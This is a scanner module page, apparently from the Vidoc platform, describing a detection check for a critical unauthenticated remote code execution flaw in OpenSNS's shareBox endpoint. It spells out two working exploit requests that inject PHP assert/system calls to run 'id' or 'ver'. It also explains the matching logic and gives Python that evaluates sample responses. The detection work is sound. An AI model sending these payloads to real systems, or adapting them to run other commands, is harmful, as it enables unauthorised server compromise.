Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

OpenSNS - Remote Code Execution

By kannthu

Critical
Vidoc Module
#opensns #rce
Description

What is "OpenSNS - Remote Code Execution"?

The "OpenSNS - Remote Code Execution" module is a test case designed to detect a critical vulnerability in the OpenSNS software. OpenSNS is a social networking platform that allows users to create and manage their own social networks. This module focuses on the "shareBox" endpoint, which is vulnerable to remote unauthenticated code execution.

The severity of this vulnerability is classified as critical, with a CVSS score of 10. This means that it poses a significant risk to the security and integrity of the OpenSNS application.

This module was authored by gy741.

Impact

If successfully exploited, this vulnerability allows remote attackers to execute arbitrary code on the targeted OpenSNS application. This can lead to unauthorized access, data breaches, and potential compromise of the entire system.

How does the module work?

The "OpenSNS - Remote Code Execution" module works by sending HTTP requests to the vulnerable "shareBox" endpoint. The module includes two request templates:

GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)

These requests exploit the vulnerability by injecting arbitrary commands into the "cmd" parameter. The module then applies matching conditions to determine if the vulnerability is present:

- The response body must match the regex ((u|g)id=) or contain "Microsoft Windows" to satisfy the first condition (the regex matcher lists both patterns; either one is enough, since "id" produces uid=/gid= output on Linux and "ver" produces "Microsoft Windows" on Windows).
- The response must contain the word "/Application/" anywhere to satisfy the second condition.
- The response status code must be 200 to satisfy the third condition.

If all the matching conditions are met, the module reports the vulnerability.
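The matching logic described above, written out as an added example that is not part of the Vidoc module or this page: the regex matcher treats its two patterns as alternatives, and the three matchers are combined with AND. The sample responses are constructed, not captured from any host.

```python
import re
from dataclasses import dataclass

# The three matchers from the module preview. The regex matcher lists two
# patterns and either one satisfies it: "uid=/gid=" comes from the "id"
# payload on Linux, "Microsoft Windows" from the "ver" payload on Windows.
# The three matchers themselves are combined with AND.
REGEX_PATTERNS = [r"((u|g)id=)", r"Microsoft Windows"]
WORD_PATTERNS = ["/Application/"]
EXPECTED_STATUS = 200


@dataclass
class HttpResponse:
    status: int
    body: str


def regex_matcher(body: str) -> bool:
    """True if any regex pattern occurs in the body (OR within the matcher)."""
    return any(re.search(p, body) for p in REGEX_PATTERNS)


def word_matcher(body: str) -> bool:
    """True if any literal word occurs in the body."""
    return any(w in body for w in WORD_PATTERNS)


def status_matcher(status: int) -> bool:
    return status == EXPECTED_STATUS


def module_matches(resp: HttpResponse) -> bool:
    """Report a vulnerability only when all three matchers agree."""
    return (regex_matcher(resp.body)
            and word_matcher(resp.body)
            and status_matcher(resp.status))


# Constructed sample responses (paths and versions are made up for illustration).
SAMPLES = {
    "linux_vulnerable": HttpResponse(200, "uid=33(www-data) gid=33(www-data)\n"
        "Notice: ... in /var/www/html/Application/Common/example.php on line 1"),
    "windows_vulnerable": HttpResponse(200, "Microsoft Windows [Version 10.0.19045.3693]\n"
        '<link href="/Application/Common/Static/css/style.css">'),
    "patched_200": HttpResponse(200, '<link href="/Application/Common/Static/css/style.css">'),
    "error_page": HttpResponse(500, "uid=33(www-data) gid=33(www-data) /Application/"),
}


def scan_samples() -> dict:
    """Evaluate every constructed sample; only the two vulnerable ones match."""
    return {name: module_matches(r) for name, r in SAMPLES.items()}
```

The "patched_200" and "error_page" samples show why all three matchers are required: a framework path alone, or command output on a non-200 page, does not trigger a report.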

Module preview

Concurrent Requests (1)
1. HTTP Request template
GET /index.php?s=weibo/S...
Matching conditions
regex: ((u|g)id=), Microsoft Windows
and
word: /Application/
and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability